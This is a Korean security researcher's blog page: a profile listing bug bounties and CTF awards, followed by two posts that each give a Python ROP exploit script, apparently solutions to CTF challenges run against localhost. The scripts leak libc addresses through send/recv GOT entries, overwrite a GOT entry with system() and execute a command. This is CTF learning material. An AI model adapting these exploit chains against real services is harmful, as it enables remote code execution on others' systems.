Profile

Profile 2013. 12. 2. 13:50

이름(Name) : 한충우 (Choongwoo Han)

닉네임(Nickname): tunz

B.S.: Computer Science and Engineering, Technology Management, in UNIST'15

Interests: Software Security, Software Testing, Program Analysis, Web Security

Mail: cwhan.tunz |at| gmail.com

소속:

KAIST SoftWare Testing & Verification (SWTV) Group (2015 ~)

CodeRed(2013 ~ )

UNIST Computer Security Club, HeXA (2011 ~ 2014)

UNIST Mobile Smart Networking (MSN) Lab (2012 ~ 2014)

Best Of the Best (BOB) 2기 (2013 ~ 2013)

 

Vulnerability Reports

- 2015 Remote Code Execution on GitHub for Mac ($2,500)

- 2015 XSS on GitHub ($1,000)

- 2015 XSS on Dropbox ($1,331).

- 2014 Remote Code Execution on Dr.Soft Netclient5 Patch Management System (KISA 14-084).

- 2014 Remote Code Execution on UNIST portal web site.

- 2013 SQL Injection and Break password encryption on UNIST portal web site.

- 2013 SQL Injection on UNIST web mail.

- 2012 Remote Code Execution on UNIST attendance checking devices.


Awards

- 2014 HDCON, 5th place (Silver Prize) (CodeC) (₩2,000,000)

- 2014 Incognito CTF, 2nd place (CodeRed) (₩640,000)

- 2014 DEF CON, Final round (CodeRed)

- 2013 HolyShield, 1st place (CodePink) (₩1,000,000)

- 2013 Korea White hat Contest (Team) 3rd place(우수상) (HeXA) (₩8,000,000) 


Talks

- 2015 Naver D2 campus seminar - 개발자가 꼭 알아야 할 보안 이야기


* If you have anything to ask, please send me an email.

'Profile' 카테고리의 다른 글

Profile  (3) 2013.12.02
posted by tunz

ubuntu 13.10에서 재현



  1. from socket import *
  2. from struct import *
  3. import time
  4.  
  5. = socket(AF_INET,SOCK_STREAM)
  6. s.connect(('localhost', 7744))
  7.  
  8. leaveret = 0x8048a68
  9. recv_plt = 0x8048770
  10. send_plt = 0x8048790
  11. bss = 0x804b080
  12. fake_ebp = bss+0x50
  13. send_got = 0x804b070
  14. ppppr = 0x804906c
  15.  
  16. cmd = "id>&4\x00"
  17.  
  18. payload = "1;"+"\x00"*(0x66c + 4 - 2)
  19. payload += pack('<L', send_plt)
  20. payload += pack('<L', ppppr)
  21. payload += pack('<L', 4)
  22. payload += pack('<L', send_got)
  23. payload += pack('<L', 4)
  24. payload += pack('<L', 0)
  25.  
  26. payload += pack('<L', recv_plt)
  27. payload += pack('<L', ppppr)
  28. payload += pack('<L', 4)
  29. payload += pack('<L', send_got)
  30. payload += pack('<L', 4)
  31. payload += pack('<L', 0)
  32.  
  33. payload += pack('<L', recv_plt)
  34. payload += pack('<L', ppppr)
  35. payload += pack('<L', 4)
  36. payload += pack('<L', bss)
  37. payload += pack('<L', len(cmd))
  38. payload += pack('<L', 0)
  39.  
  40. payload += pack('<L', send_plt)
  41. payload += "AAAA"
  42. payload += pack('<L', bss)
  43.  
  44. time.sleep(0.5)
  45. print s.recv(1024)
  46. s.send("4\n")
  47. time.sleep(0.5)
  48. print s.recv(1024)
  49.  
  50. raw_input('go?')
  51.  
  52. s.send(";"*0x38 + pack('<L',len(payload)))
  53. time.sleep(1)
  54. print s.recv(1024)
  55. s.send(payload)
  56. time.sleep(1)
  57. #print s.recv(5)
  58.  
  59. #time.sleep(1)
  60. send_addr = unpack('<L',s.recv(4))[0]
  61. system_addr = send_addr - 0xf3940 + 0x41260
  62.  
  63. print "System: "+hex(system_addr)
  64.  
  65. s.send(pack('<L',system_addr))
  66. s.send(cmd)
  67.  
  68. time.sleep(0.1)
  69. print s.recv(1024)
  70.  
  71. s.close()


posted by tunz
  • hea 2013.11.28 23:35

    안녕하세요 저도 요근래 ROP공부를 하고 있는데 offset계산해서 add가젯 같은거 사용하는 개념까진 알겠는데 리모트 익스플로잇할때 recv send 같은걸 어떻게 사용해주는지 잘 모르겠더라구요.. 혹시 관련 좋은 문서 있을까요?

    • tunz 2013.11.29 01:58 신고

      음... 저도 딱히 문서 하나만 보고 공부한게 아니라서,
      GOT랑 plt가 정확히 뭔지만 아는 상태로, 간단한 CTF exploit 하나 분석하시면 딱 느낌이 오실거에요

우분투 12.04에서 재현


  1. from socket import *
  2. from struct import *
  3. import time
  4.  
  5. fputs_plt = 0x8048800
  6. fputs_got = 0x804B064
  7. recv_plt = 0x8048810
  8. send_plt = 0x8048830
  9. ppppr = 0x80499FC
  10. bss = 0x804c0dc
  11.  
  12. cmd = "id>&4\x00"
  13.  
  14. i=0
  15. while True:
  16.         print "Send! %d" % i
  17.         i += 1
  18.         s = socket(AF_INET, SOCK_STREAM)
  19.  
  20.         s.connect(('localhost',8080))
  21.  
  22.         time.sleep(0.3)
  23.         print s.recv(10000)
  24.  
  25.         #raw_input('go?')
  26.  
  27.         vmcode = ""
  28.  
  29.         # auth 2
  30.         vmcode += "#\x00\x00\x00\x00"*1024 # index + 4*
  31.         vmcode += ("P\x10"+"$\x08")*8 # get secret
  32.         vmcode += "P\x10"
  33.         vmcode += "9R"
  34.  
  35.         # auth 3
  36.         vmcode += "\x91"
  37.         vmcode += pack('<L',0xdeadbeef)*2
  38.  
  39.         # overflow
  40.         vmcode += "\xef"
  41.  
  42.         vmcode += "A"*0x20
  43.  
  44.         # ROP
  45.         vmcode += pack('<L',send_plt)
  46.         vmcode += pack('<L',ppppr)
  47.         vmcode += pack('<L',4)
  48.         vmcode += pack('<L',fputs_got)
  49.         vmcode += pack('<L',4)
  50.         vmcode += pack('<L',0)
  51.  
  52.         vmcode += pack('<L',recv_plt)
  53.         vmcode += pack('<L',ppppr)
  54.         vmcode += pack('<L',4)
  55.         vmcode += pack('<L',fputs_got)
  56.         vmcode += pack('<L',4)
  57.         vmcode += pack('<L',0)
  58.  
  59.         vmcode += pack('<L',recv_plt)
  60.         vmcode += pack('<L',ppppr)
  61.         vmcode += pack('<L',4)
  62.         vmcode += pack('<L',bss)
  63.         vmcode += pack('<L',len(cmd))
  64.         vmcode += pack('<L',0)
  65.  
  66.         vmcode += pack('<L',fputs_plt)
  67.         vmcode += "AAAA"
  68.         vmcode += pack('<L',bss)
  69.  
  70.         s.send(vmcode + " "*(0x400*6 - len(vmcode)))
  71.  
  72.         try:
  73.                 fputs_addr = unpack('<L',s.recv(4))[0]
  74.         except:
  75.                 continue
  76.         system_addr = fputs_addr - 0x66100 + 0x3f430
  77.         print "System: "+hex(system_addr)
  78.  
  79.         s.send(pack('<L',system_addr))
  80.  
  81.         s.send(cmd)
  82.  
  83.         out = s.recv(65000)
  84.         if "uid" in out:
  85.                 print out
  86.                 break
  87.  
  88.         s.close()


posted by tunz
  • xeros 2014.02.06 18:37

    secuinside 2013 두문제 파일좀 올려주시면 감사하겠습니다ㅎ

  • xeros 2014.02.09 19:48

    어.. 거기에 있었네요.. 맨밑에 잇어서 못알아차린거 같네요.. 감사합니다